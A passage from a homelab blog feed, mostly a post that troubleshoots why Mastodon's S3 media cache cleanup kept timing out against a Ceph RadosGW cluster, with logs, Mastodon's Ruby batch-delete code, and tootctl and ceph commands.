the code I&rsquo;d like to make configurable via the HomelabBackupConfig or
HomelabServiceBackup.
And then there&rsquo;s also my wish to finally go and learn Golang. With this
operator, I&rsquo;ve got a really good-sized first project. And I would have the
advantage that it&rsquo;s not a greenfield project. Most of the design is already done,
so I would be able to concentrate on writing Go.</p>
<p>I will write one more post on the operator, as part of the Nomad to k8s series,
treating it as just another app and describing what the deployment looks like.</p>
<p>And finally, I&rsquo;m quite happy that I&rsquo;m done with this now. I&rsquo;ve been looking
forward to being able to continue the k8s migration for way too long.</p>
<p>My longing for continuing the migration has been getting so bad that I&rsquo;ve started
to miss YAML.</p>
<p>Almost.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Cleaning up my Mastodon Media Cache</title>
      <link>https://blog.mei-home.net/posts/mastodon-media-cache-cleanup-issue/</link>
      <pubDate>Wed, 27 Nov 2024 00:01:23 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/mastodon-media-cache-cleanup-issue/</guid>
      <description>Mastodon is actually innocent</description>
      <content:encoded><![CDATA[<p>I recently randomly wandered onto the Mastodon admin page. What I saw there
will shock you.</p>
<p>(I&rsquo;m so sorry about that introduction)</p>
<figure>
    <img loading="lazy" src="space-usage.png"
         alt="A screenshot of the SPACE USAGE section of the Mastodon admin dashboard. It shows the Postgres DB at 1.75 GB, Redis at 27.8 MB and the media storage at 447 GB."/> <figcaption>
            <p>That&rsquo;s perhaps a bit much in the Media storage area for a single user instance.</p>
        </figcaption>
</figure>

<p>I was pretty sure that I had previously configured Mastodon&rsquo;s media cache
retention to 7 days. Checking up on that, I found that I had remembered correctly.</p>
<p>So I dug a bit deeper, and it turns out that the Vacuum failed. If you&rsquo;d like
to check in your own logs, search the Sidekiq logs for <code>Vacuum</code>:</p>
<pre tabindex="0"><code>2024-09-01T05:35:00.024Z pid=7 tid=3dwb INFO: queueing Scheduler::VacuumScheduler (vacuum_scheduler)
E, [2024-09-01T05:35:15.395684 #7] ERROR -- : Error while running Vacuum::MediaAttachmentsVacuum: Net::ReadTimeout with #&lt;TCPSocket:(closed)&gt;
2024-09-01T05:36:49.666Z pid=7 tid=1bhhb class=Scheduler::VacuumScheduler jid=eb78e67fb9d775c1cac1e187 elapsed=109.631 INFO: done
</code></pre><p>These log lines repeated every day. There hasn&rsquo;t been a single successful run
in months, leading to 477 GB of media files. After some googling, I ended up
with the idea that this might be due to the batch size that Mastodon uses by
default for these delete requests to S3. So I reduced it to 100, from the default 1000.</p>
<p>This also failed, with the same log output. So I decided to look a bit closer
at my media storage, which is in an S3 bucket on my Homelab&rsquo;s Ceph storage
cluster. Looking at the RGW S3 daemons in my cluster, I found these log lines:</p>
<pre tabindex="0"><code>2024-10-19T03:32:31.269+0000 7f825e354700  1 ====== starting new request req=0x7f8161159660 =====
2024-10-19T03:32:36.273+0000 7f8166965700  1 req 1601675399780187004 5.004083157s op-&gt;ERRORHANDLER: err_no=-2 new_err_no=-2
2024-10-19T03:32:36.273+0000 7f8166965700  1 ====== req done req=0x7f8161159660 op status=-2 http_status=404 latency=5.004083157s ======
2024-10-19T03:32:36.273+0000 7f8166965700  1 beast: 0x7f8161159660: 260.0.0.10 - mastodon [19/Oct/2024:03:32:31.269 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=5.004083157s
</code></pre><p>And many more like them.</p>
<h2 id="detour-mastodon-media-cache-cleanup-implementation">Detour: Mastodon media cache cleanup implementation</h2>
<p>Let&rsquo;s do a short detour and look at what exactly this vacuum job does with
S3 based storage.
The interesting part of the code can be found in the <a href="https://github.com/mastodon/mastodon/blob/v4.3.0/app/lib/attachment_batch.rb">app/lib/attachment_batch.rb</a>
file. The relevant part for this discussion is this one:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-ruby" data-lang="ruby"><span style="display:flex;"><span><span style="color:#75715e"># We can batch deletes over S3, but there is a limit of how many</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># objects can be processed at once, so we have to potentially</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># separate them into multiple calls.</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>retries <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>keys<span style="color:#f92672">.</span>each_slice(<span style="color:#66d9ef">LIMIT</span>) <span style="color:#66d9ef">do</span> <span style="color:#f92672">|</span>keys_slice<span style="color:#f92672">|</span>
</span></span><span style="display:flex;"><span>  logger<span style="color:#f92672">.</span>debug { <span style="color:#e6db74">&#34;Deleting </span><span style="color:#e6db74">#{</span>keys_slice<span style="color:#f92672">.</span>size<span style="color:#e6db74">}</span><span style="color:#e6db74"> objects&#34;</span> }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  bucket<span style="color:#f92672">.</span>delete_objects(<span style="color:#e6db74">delete</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">objects</span>: keys_slice<span style="color:#f92672">.</span>map { <span style="color:#f92672">|</span>key<span style="color:#f92672">|</span> { <span style="color:#e6db74">key</span>: key } },
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">quiet</span>: <span style="color:#66d9ef">true</span>,
</span></span><span style="display:flex;"><span>  })
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">rescue</span> <span style="color:#f92672">=&gt;</span> e
</span></span><span style="display:flex;"><span>  retries <span style="color:#f92672">+=</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> retries <span style="color:#f92672">&lt;</span> <span style="color:#66d9ef">MAX_RETRY</span>
</span></span><span style="display:flex;"><span>    logger<span style="color:#f92672">.</span>debug <span style="color:#e6db74">&#34;Retry </span><span style="color:#e6db74">#{</span>retries<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">#{</span><span style="color:#66d9ef">MAX_RETRY</span><span style="color:#e6db74">}</span><span style="color:#e6db74"> after </span><span style="color:#e6db74">#{</span>e<span style="color:#f92672">.</span>message<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    sleep <span style="color:#ae81ff">2</span><span style="color:#f92672">**</span>retries
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">retry</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>    logger<span style="color:#f92672">.</span>error <span style="color:#e6db74">&#34;Batch deletion from S3 failed after </span><span style="color:#e6db74">#{</span>e<span style="color:#f92672">.</span>message<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">raise</span> e
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">end</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">end</span>
</span></span></code></pre></div><p>What happens here is Mastodon using the <a href="https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteObjects.html">DeleteObjects</a>
S3 API. With this API, you don&rsquo;t delete one object per request, but instead
send over an XML document with all of the paths to be deleted in a single
request.</p>
<p>The size of the batches is configurable with the <code>S3_BATCH_DELETE_LIMIT</code> variable.
The number of retries for a failed delete can be set in turn with <code>S3_BATCH_DELETE_RETRY</code>.</p>
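<p>If Ruby isn&rsquo;t your thing, the equivalent call looks like this in Python with
boto3 - purely for illustration, with placeholder endpoint, bucket and keys:</p>
<pre tabindex="0"><code>import boto3

s3 = boto3.client(&#34;s3&#34;, endpoint_url=&#34;https://s3.example.com&#34;)
keys = [&#34;cache/media_attachments/files/some/fake/key.jpg&#34;]  # placeholder keys

# One request deletes a whole batch of objects.
s3.delete_objects(
    Bucket=&#34;mastodon&#34;,
    Delete={
        &#34;Objects&#34;: [{&#34;Key&#34;: key} for key in keys],
        &#34;Quiet&#34;: True,
    },
)
</code></pre>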
<h2 id="trial-and-error">Trial and error</h2>
<p>Looking more closely at those log lines, I found specifically the last one
pretty interesting:</p>
<pre tabindex="0"><code>2024-10-19T03:32:36.273+0000 7f8166965700  1 beast: 0x7f8161159660: 10.86.5.129 - mastodon [19/Oct/2024:03:32:31.269 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=5.004083157s
</code></pre><p>Namely that the latency is given as (almost) 5 seconds. Triggering the vacuum
job several more times, I found that the latency stayed the same: Around 5
seconds for every failed request. At the same time, Mastodon&rsquo;s logs were talking
about a read timeout:</p>
<pre tabindex="0"><code>E, [2024-09-01T05:35:15.395684 #7] ERROR -- : Error while running Vacuum::MediaAttachmentsVacuum: Net::ReadTimeout with #&lt;TCPSocket:(closed)&gt;
</code></pre><p>So looking around a bit, I found the <code>S3_READ_TIMEOUT</code> variable in Mastodon.</p>
<blockquote>
<p>Default: 5 (seconds)</p>
<p>The number of seconds before the HTTP handler should timeout while waiting for an HTTP response.</p></blockquote>
<p>That default of 5 seconds fits the 5 second latency from the S3 RadosGW logs
perfectly. So I increased that value to 600 seconds. Because honestly, I
didn&rsquo;t really care how long it took, as long as it finished before the next
run of the Vacuum job.</p>
<p>But this was also unsuccessful, with RadosGW timing out the request this
time around.</p>
<p>I then decided to turn to the <code>tootctl</code> tool&rsquo;s <a href="https://docs.joinmastodon.org/admin/tootctl/#media-remove">media remove</a>
command, with the following invocation at first:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>tootctl media remove --days <span style="color:#ae81ff">7</span>
</span></span></code></pre></div><p>And this worked like a charm. I mean, almost. It crashed the Sidekiq container
I ran it in several times via OOM, until I created a separate container and provided
it with 4 GB of RAM.
The effect of those invocations can be seen in the post&rsquo;s cover image. I
initially deleted about 150k objects, followed by another whopping 900k objects.
Note: These are RADOS objects in the Ceph cluster, which do not necessarily have
a 1:1 relationship to S3 objects.
But still. My Mastodon media cache accidentally took up pretty much 50% of my
cluster&rsquo;s overall RADOS objects at that time. And that cluster also houses my
considerable media collection, digitized documents, podcasts and so on and so
forth.</p>
<figure>
    <img loading="lazy" src="object-changes.png"
         alt="A screenshot of a Grafana time series plot titled &#39;Object count changes by pool&#39;. It shows time on the X axis and RADOS object count changes per minute on the Y axis. The plot starts out vacillating a bit around 0 changes. Then on October 19th, 20:00, 500 objects are deleted per minute. With a couple of places where the plot returns to around 0 object changes, this holds until 02:30 on October 20th. The plot returns back to around zero for a while, until it goes down to about 950 deleted objects per minute from October 20th 10:00 to 21:15 on that same day."/> <figcaption>
            <p>The object change graph of my Ceph cluster. It clearly shows that it can easily handle about 1k deletes per minute.</p>
        </figcaption>
</figure>

<p>The above graph shows the problem: My Ceph cluster can easily delete almost 1k
objects per minute. That it should take five seconds to delete 100 objects - and, in a
later test, just 10 - is ridiculous.</p>
<p>The big difference between <code>tootctl media remove</code> and what the Vacuum job does
lies in which S3 APIs they use. As I&rsquo;ve mentioned above, the Vacuum job uses
the DeleteObjects API and hits some sort of issue that makes it run into Masto&rsquo;s
read timeout.
<code>tootctl media remove</code>, on the other hand, sends DELETE requests:</p>
<pre tabindex="0"><code>2024-10-19T18:32:55.170+0000 7fa90b9df700  1 ====== starting new request req=0x7fa9c4a52660 =====
2024-10-19T18:32:55.178+0000 7fa90b9df700  1 ====== req done req=0x7fa9c4a52660 op status=0 http_status=200 latency=0.008000003s ======
2024-10-19T18:32:55.178+0000 7fa90b9df700  1 beast: 0x7fa9c4a52660: 260.0.0.10 - mastodon [19/Oct/2024:18:32:55.170 +0000] &#34;HEAD /mastodon/cache/media_attachments/files/111/526/742/001/415/010/small/d73862fc1c5188e0.jpg HTTP/1.1&#34; 200 0 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,B,N&#34; - latency=0.008000003s
2024-10-19T18:32:55.190+0000 7fa8968f5700  1 ====== starting new request req=0x7fa9c4a52660 =====
2024-10-19T18:32:55.246+0000 7fa935232700  1 ====== req done req=0x7fa9c4a52660 op status=0 http_status=204 latency=0.056000017s ======
2024-10-19T18:32:55.246+0000 7fa935232700  1 beast: 0x7fa9c4a52660: 260.0.0.10 - mastodon [19/Oct/2024:18:32:55.190 +0000] &#34;DELETE /mastodon/cache/media_attachments/files/111/526/742/001/415/010/original/d73862fc1c5188e0.jpg HTTP/1.1&#34; 204 0 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=0.056000017s
</code></pre><p>Interestingly, if I take the latency of that delete - roughly 0.05 seconds - times 100
requests, I end up with the problematic 5 second S3 read timeout the Vacuum job
is hitting.
But sadly, this is not the problem, because I also tried the Vacuum job with a
batch size of 10 and got the same results. That is ridiculous, as the
graph above shows: the cluster can indeed handle roughly 1k requests per minute.</p>
<p>Next, I decided to reduce the batch size to 1 and increase the <code>S3_READ_TIMEOUT</code>
to 60 seconds. With that, I got a mix of results, which is even weirder. First
of all, I had not a single failure in the large number of DELETE requests that
<code>tootctl media remove</code> sent, and I wasn&rsquo;t doing anything really different here -
just using a different API. But the results were still a mix of 404 after the
60 second read timeout, and successful runs:</p>
<pre tabindex="0"><code>2024-10-26T07:22:09.199+0000 7fb404aae700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:22:08.123 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.076018214s
2024-10-26T07:23:59.137+0000 7fb404aae700  1 beast: 0x7fb3ce13e660: 260.0.0.10 - mastodon [26/Oct/2024:07:23:58.053 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.084018350s
2024-10-26T07:33:02.526+0000 7fb479397700  1 beast: 0x7fb3ce03c660: 260.0.0.10 - mastodon [26/Oct/2024:07:32:02.453 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.073013306s
2024-10-26T07:34:04.623+0000 7fb426af2700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:33:04.562 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.061012268s
2024-10-26T07:35:08.732+0000 7fb427af4700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:34:08.671 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.061012268s
2024-10-26T07:36:16.833+0000 7fb3e426d700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:35:16.772 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.061012268s
2024-10-26T07:37:32.930+0000 7fb48e3c1700  1 beast: 0x7fb3ce1bf660: 260.0.0.10 - mastodon [26/Oct/2024:07:36:32.873 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.057010651s
2024-10-26T07:41:09.146+0000 7fb430305700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:40:09.093 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.053012848s
2024-10-26T07:44:17.253+0000 7fb44eb42700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:43:17.196 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.057010651s
2024-10-26T07:49:33.370+0000 7fb4b2c0a700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:48:33.305 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.065013885s
2024-10-26T08:00:06.441+0000 7fb4202e5700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:59:06.396 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.044975281s
2024-10-26T08:03:20.760+0000 7fb4963d1700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:02:20.711 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.048984528s
2024-10-26T08:04:36.873+0000 7fb4cdc40700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:03:36.812 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.060985565s
2024-10-26T08:09:00.294+0000 7fb4042ad700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:08:59.246 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.048017383s
2024-10-26T08:12:22.101+0000 7fb404aae700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:12:21.033 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.068017721s
2024-10-26T08:13:15.786+0000 7fb404aae700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:13:14.742 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.044017315s
2024-10-26T08:15:44.468+0000 7fb4172d3700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:15:43.404 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.064017773s
2024-10-26T08:18:53.404+0000 7fb3dca5e700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:18:52.336 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.068017840s
2024-10-26T08:41:17.738+0000 7fb4042ad700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:41:16.690 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.048017621s
2024-10-26T08:47:17.448+0000 7fb41aada700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:47:16.404 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.044017553s
2024-10-26T08:50:33.055+0000 7fb4042ad700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:50:31.987 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.068017960s
</code></pre><p>This result somehow makes even less sense than the previous ones. Why would deleting
a single object per request sometimes take 60 seconds, and sometimes just 1
second?
I had no idea whatsoever. But the result convinced me that Mastodon was likely
not at fault here. There had to be some issue with my Ceph cluster&rsquo;s RGW setup.</p>
<h2 id="digging-deep">Digging deep</h2>
<p>Thinking that the issue had to be in the Ceph RadosGW (the Ceph component providing
an S3 API), I first increased the debug level to max and did some more delete
attempts.</p>
<p>I enabled the debug logs in the RGW daemons with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph config set client.rgw debug_rgw 20/5
</span></span></code></pre></div><p>This spits out a lot of debug logs. I shortened the logs below.</p>
<p>Here are the logs of a working one:</p>
<pre tabindex="0"><code>0.000000000s initializing for trans_id = tx000003cf3e5d2ed1c29cf-00671ccd8a-4445ad-homenet
0.000000000s rgw api priority: s3=8 s3website=7
0.000000000s host=s3.example.com
0.000000000s subdomain= domain= in_hosted_domain=0 in_hosted_domain_s3website=0
0.000000000s final domain/bucket subdomain= domain= in_hosted_domain=0 in_hosted_domain_s3website=0 s-&gt;info.domain= s-&gt;info.request_uri=/mastodon
[...]
0.004000068s s3:multi_object_delete reading permissions
0.004000068s s3:multi_object_delete init op
0.004000068s s3:multi_object_delete verifying op mask
0.004000068s s3:multi_object_delete required_mask= 4 user.op_mask=7
0.004000068s s3:multi_object_delete verifying op permissions
1.004017115s s3:multi_object_delete NOTICE: call to do_aws4_auth_completion
1.004017115s s3:multi_object_delete v4 auth ok -- do_aws4_auth_completion
1.004017115s s3:multi_object_delete NOTICE: call to do_aws4_auth_completion
1.004017115s s3:multi_object_delete -- Getting permissions begin with perm_mask=50
[...]
1.004017115s s3:multi_object_delete verifying op params
1.004017115s s3:multi_object_delete pre-executing
1.004017115s s3:multi_object_delete check rate limiting
1.004017115s s3:multi_object_delete executing
1.004017115s s3:multi_object_delete get_obj_state: rctx=0x7fb3ce13d9a0 obj=mastodon:cache/media_attachments/files/113/278/263/816/166/764/original/cf2d002b5ad122a0.png state=0x564633f22de8 s-&gt;prefetch_data=0
1.004017115s s3:multi_object_delete WARNING: blocking librados call
1.004017115s s3:multi_object_delete manifest: total_size = 302601
1.004017115s s3:multi_object_delete get_obj_state: setting s-&gt;obj_tag to 87393fd3-1c76-49fc-bed3-c132da8963ec.4434159.8185423419560928886
1.004017115s s3:multi_object_delete get_obj_state: rctx=0x7fb3ce13d9a0 obj=mastodon:cache/media_attachments/files/113/278/263/816/166/764/original/cf2d002b5ad122a0.png state=0x564633f22de8 s-&gt;prefetch_data=0
1.004017115s s3:multi_object_delete get_obj_state: rctx=0x7fb3ce13d9a0 obj=mastodon:cache/media_attachments/files/113/278/263/816/166/764/original/cf2d002b5ad122a0.png state=0x564633f22de8 s-&gt;prefetch_data=0
1.004017115s s3:multi_object_delete  bucket index object: homenet.rgw.buckets.index:.dir.87393fd3-1c76-49fc-bed3-c132da8963ec.4314167.1.16
1.016017318s s3:multi_object_delete WARNING: blocking librados call
1.044017792s s3:multi_object_delete cache get: name=homenet.rgw.log++bucket.sync-source-hints.mastodon : hit (negative entry)
1.044017792s s3:multi_object_delete cache get: name=homenet.rgw.log++bucket.sync-target-hints.mastodon : hit (negative entry)
1.044017792s s3:multi_object_delete chain_cache_entry: cache_locator=
1.044017792s s3:multi_object_delete chain_cache_entry: couldn&#39;t find cache locator
1.044017792s s3:multi_object_delete couldn&#39;t put bucket_sync_policy cache entry, might have raced with data changes
1.044017792s s3:multi_object_delete completing
1.044017792s s3:multi_object_delete op status=0
1.044017792s s3:multi_object_delete http status=200
</code></pre><p>Note how most of the time here is spent verifying the permissions. Almost an
entire second. The actual deletion process doesn&rsquo;t seem to take any time at all.</p>
<p>Here&rsquo;s another log, this one from a failed execution which ran into a timeout:</p>
<pre tabindex="0"><code>0.000000000s initializing for trans_id = tx00000ce815c8f63c5944a-00671cc609-441e22-homenet
0.000000000s rgw api priority: s3=8 s3website=7
0.000000000s host=s3.example.com
0.000000000s subdomain= domain= in_hosted_domain=0 in_hosted_domain_s3website=0
0.000000000s final domain/bucket subdomain= domain= in_hosted_domain=0 in_hosted_domain_s3website=0 s-&gt;info.domain= s-&gt;info.request_uri=/mastodon
[...]
0.004000000s s3:multi_object_delete reading permissions
0.004000000s s3:multi_object_delete init op
0.004000000s s3:multi_object_delete verifying op mask
0.004000000s s3:multi_object_delete required_mask= 4 user.op_mask=7
0.004000000s s3:multi_object_delete verifying op permissions
60.060012817s op-&gt;ERRORHANDLER: err_no=-2 new_err_no=-2
60.060012817s get_system_obj_state: rctx=0x7fa5c1848690 obj=homenet.rgw.log:script.postrequest. state=0x56036bf760a0 s-&gt;prefetch_data=0
60.060012817s cache get: name=homenet.rgw.log++script.postrequest. : hit (negative entry)
60.060012817s s3:multi_object_delete op status=-2
60.060012817s s3:multi_object_delete http status=404
</code></pre><p>Here, the next log line, <code>NOTICE: call to do_aws4_auth_completion</code>, never
appears. Instead, the operation fails because Mastodon runs into its 60 second
S3 read timeout and closes the connection. In the working call, the next log
line also only appeared after a long delay of almost one second, but it did appear.
Here, nothing seems to be happening at all.</p>
<p>I had a look at the source code of the RGW as well (yay, open source!).
I was able to find the function which produces the <code>verifying op permissions</code>
log line at <a href="https://github.com/ceph/ceph/blob/f817ceb7f187defb1d021d6328fa833eb8e943b3/src/rgw/rgw_process.cc#L220">line 220 in rgw_process.cc</a>.
That calls <code>verify_permission</code> on the <code>DeleteObjects</code> API implementation,
in <a href="https://github.com/ceph/ceph/blob/f817ceb7f187defb1d021d6328fa833eb8e943b3/src/rgw/rgw_op.cc#L6746">rgw_op.cc</a>.
But that was as far as I got. I tried to google around a bit for the names of
the functions I had identified, but the only thing I found was <a href="https://tracker.ceph.com/issues/63373">this bug</a>
about a potential deadlock issue, and in the end it didn&rsquo;t read like
anything relevant to my problem either.</p>
<p>At this point I pretty much gave up. I toyed a bit with the idea that perhaps
there was some issue with the RGW client contacting the MON daemon while
checking the permissions, but then realized that this is not Ceph auth, but
S3 auth, which is done entirely inside the RGW daemon.</p>
<p>It was quite interesting to rummage through the Ceph RGW codebase, but sadly
it did not yield any results.</p>
<h2 id="updating-ceph">Updating Ceph</h2>
<p>As a last-ditch attempt at a fix, I decided to update my baremetal Ceph cluster
to v18. That did not fix the issue either, but it was still worth doing,
considering that v17 has been out of support for a while now.</p>
<h2 id="it-works---after-a-fashion">It works - after a fashion</h2>
<p>So the end result of all the time I spent on this was a whole lot of &ldquo;not very much&rdquo;.
But it still did something. Here&rsquo;s the development of the total number of Ceph
objects in the cluster after the big deletion:</p>
<figure>
    <img loading="lazy" src="objects-regular-cleanup.png"
         alt="Another Grafana time series visualization screenshot. This one shows the total RADOS objects in the cluster again. It starts on October 23rd and goes to November 26th. It has a see-saw look to it. In some intervals, the number rises consistently to then drop precipitously. In others, the day sees consistent growth again, but followed right away with a smaller drop. The main feature is the un-eveness. Sometimes the drop is daily, and sometimes only once a week. There&#39;s no obvious pattern."/> <figcaption>
            <p>The deletions happen unevenly.</p>
        </figcaption>
</figure>

<p>As the graph shows, deletion does now work, but it works unevenly. Sometimes
no objects get deleted at all, with the job running out of retries on the very
first deletion. And sometimes it successfully runs for
hours and deletes 10k objects. I&rsquo;m happy to see that it works at all, but I&rsquo;m
still a bit disappointed that I wasn&rsquo;t able to figure out what the actual
problem was.</p>
